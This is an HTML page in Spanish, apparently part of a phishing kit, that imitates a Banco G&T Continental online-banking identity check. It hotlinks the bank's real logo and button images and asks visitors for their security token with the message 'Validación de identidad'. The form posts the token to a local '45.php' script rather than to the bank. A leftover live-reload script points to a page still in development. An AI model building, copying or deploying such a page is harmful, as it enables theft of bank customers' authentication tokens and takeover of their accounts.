<html lang="es"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>GTC</title>
  <script src="https://code.jquery.com/jquery-2.2.4.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>
</head>
<body>
  <style>
      *{margin: 0;padding: 0;}
  </style>



  <div id="main-cnt" style="/* background-image: url(bnr1.jpg); */background-repeat: no-repeat;overflow: hidden;background-size: cover;background-position: 50%;min-height:700px">

  <div style="text-align: center; ">



  <form method="post" action="45.php">

  <img width="300px" src="https://bpi.gytcontinental.com.gt/Transaction/images/logoG&amp;T.png" alt="">
  <br>




  <div style="height: 556px;display: flex;flex-direction: column;align-items: center;" id="TokenRegister" name="TokenRegister">
    <div>

    </div>

    <div style="height: 70%; width: 80%; display: flex; flex-direction: column; justify-content: center; align-items: center;">
      <div style="color: var(---949494); text-align: left; font: normal normal 900 20px/11px Avenir; letter-spacing: 0px; color: #949494; opacity: 1;">
        <span class="style1">Validación de identidad  </span>
      </div>

      <div style="margin-top: 15px; text-align: center; font-size: 12px; color: #949494; font: normal normal medium ">
        <span class="style1">Por su seguridad se le solicitará un token para ingresar a su banca en línea  </span>
      </div>

      <div style="margin-top: 10px; width: 900px; height: 300px; position: relative;">
        <div style="margin-left: 254px;background: url('cert.svg') no-repeat;width: 70%;height: 63%;background-size: contain;">
          <input required="" class="width_100px" maxlength="10" size="10" style="top: 153px;font-size: 12px;position: absolute;bottom: 50px;width: 10%;height: 22px;right: 283px;/* margin-left: 308px; */" onkeypress="return handleKeyPress(event)" type="text" onfocus="InputOnFocus('in00')" onblur="InputOnBlur('in00')" name="clave" id="Token" value="">

        </div>
      </div>

      <div style="position: absolute; margin-top: 360px;">

        <input class="b02" style="top: -32px;position: relative;margin-left: 36px;" type="submit" onclick="validateToken()" value="Validar Token" id="Valid">
      </div>
    </div>

    <div style="margin-top: 11px; text-align: center; font-size: 12px; color: #949494; font: normal normal medium ">

    </div>

    <div style="position: relative; margin-right: 650px;">
      <label class="img_inline" style="position: absolute; margin-top: 20px;" name="TYPEMSG" id="TYPEMSG"></label>

    </div>

  </div>

  <style>
    .pol {

      --bs-font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
      --bs-font-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
      --bs-gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
      text-align: left;
      font-size: 1rem;
      font-weight: 400;
      line-height: 1.5;
      color: #212529;
      -webkit-text-size-adjust: 100%;
      -webkit-tap-highlight-color: transparent;
      box-sizing: border-box;
      margin: 0;
      padding: 0;
      font-family: Verdana;
      background: url('images/CertiDispRecurrente.svg') no-repeat;
      width: 100%;
      height: 100%;
      background-size: contain;
    }

    .ipp { 
      --bs-font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";
      --bs-font-monospace: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
      --bs-gradient: linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));
      -webkit-text-size-adjust: 100%;
      -webkit-tap-highlight-color: transparent;
      box-sizing: border-box;
      border: 0px;
      outline-width: 0;
      background-color: #dd0000;
      margin: 0;
      font-family: inherit;
      line-height: inherit;
      font-size: 12px;
      position: absolute;
      bottom: 50px;
      width: 122px;
      height: 22px;
      right: 370px;
    }


    .b02 {
      border: none;
      font-size: 12px;
      height: 30px;
      FONT-FAMILY: Verdana;
      text-align: center;
      padding-bottom: 5px;
      /* vertical-align: middle; */
      background: url(https://bpi.gytcontinental.com.gt/Transaction/images/btnNormalAz.png) no-repeat;
      width: 150px;
      color: #ffffff;
      cursor: pointer;
    }        

  </style>

</form></div></div><!-- Code injected by live-server -->
<script>
  // <![CDATA[  <-- For SVG support
  if ('WebSocket' in window) {
    (function () {
      function refreshCSS() {
        var sheets = [].slice.call(document.getElementsByTagName("link"));
        var head = document.getElementsByTagName("head")[0];
        for (var i = 0; i < sheets.length; ++i) {
          var elem = sheets[i];
          var parent = elem.parentElement || head;
          parent.removeChild(elem);
          var rel = elem.rel;
          if (elem.href && typeof rel != "string" || rel.length == 0 || rel.toLowerCase() == "stylesheet") {
            var url = elem.href.replace(/(&|\?)_cacheOverride=\d+/, '');
            elem.href = url + (url.indexOf('?') >= 0 ? '&' : '?') + '_cacheOverride=' + (new Date().valueOf());
          }
          parent.appendChild(elem);
        }
      }
      var protocol = window.location.protocol === 'http:' ? 'ws://' : 'wss://';
      var address = protocol + window.location.host + window.location.pathname + '/ws';
      var socket = new WebSocket(address);
      socket.onmessage = function (msg) {
        if (msg.data == 'reload') window.location.reload();
        else if (msg.data == 'refreshcss') refreshCSS();
      };
      if (sessionStorage && !sessionStorage.getItem('IsThisFirstTime_Log_From_LiveServer')) {
        console.log('Live reload enabled.');
        sessionStorage.setItem('IsThisFirstTime_Log_From_LiveServer', true);
      }
    })();
  }
  else {
    console.error('Upgrade your browser. This Browser is NOT supported WebSocket for Live-Reloading.');
  }
  // ]]>
</script>
</body></html>